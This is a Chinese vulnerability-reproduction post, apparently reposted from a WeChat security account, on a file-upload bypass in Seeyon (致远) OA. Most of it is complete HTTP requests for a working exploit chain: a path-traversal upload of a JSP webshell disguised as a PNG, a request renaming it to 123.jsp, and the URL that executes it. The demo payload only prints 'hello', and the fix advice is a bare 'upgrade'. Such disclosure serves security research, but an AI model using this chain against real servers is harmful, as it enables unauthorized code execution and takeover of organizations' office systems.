免责声明

请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、简介

致远OA系统在企业中具有广泛的应用和作用。它能够帮助企业打破部门壁垒,实现信息共享和协同办公,提高沟通效率和工作效率。通过流程审批管理,致远OA系统能够简化各类审批流程,降低管理成本和错误率。

二、漏洞描述

致远OA fileUpload.do 前台文件上传绕过漏洞,攻击者可通过构造恶意Payload执行并获取服务器系统权限。

三、漏洞复现

1、上传图片马,返回 fileid 值
POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload
HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN)
AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287
c9dfb30)
Content-Length: 754


--00content0boundary00
Content-Disposition: form-data; name="type"
--00content0boundary00
Content-Disposition: form-data; name="extensions" 
png
--00content0boundary00
Content-Disposition: form-data; name="applicationCategory"
--00content0boundary00
Content-Disposition: form-data; name="destDirectory"
--00content0boundary00
Content-Disposition: form-data; name="destFilename"
--00content0boundary00
Content-Disposition: form-data; name="maxSize"

--00content0boundary00
Content-Disposition: form-data; name="isEncrypt"


false
--00content0boundary00


Content-Disposition: form-data; name="file1"; filename="1.png" 
Content-Type: Content-Type: application/pdf

<% out.println("hello");%>

--00content0boundary00--

2、修改文件后缀为 jsp
POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser;
SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
Content-Length: 64

method=uploadMenuIcon&fileid=ID 值&filename=123.jsp

3、访问 jsp 文件触发恶意 jsp 代码
/seeyon/main/menuIcon/123.jsp

四、修复建议

升级到安全版本!!!


原文始发于微信公众号(白帽攻防):【漏洞复现】致远OA fileUpload.do 前台文件上传绕过漏洞

Logo

北京人形旗下天工造物具身智能开源社区,聚焦具身天工与慧思开物两大平台

更多推荐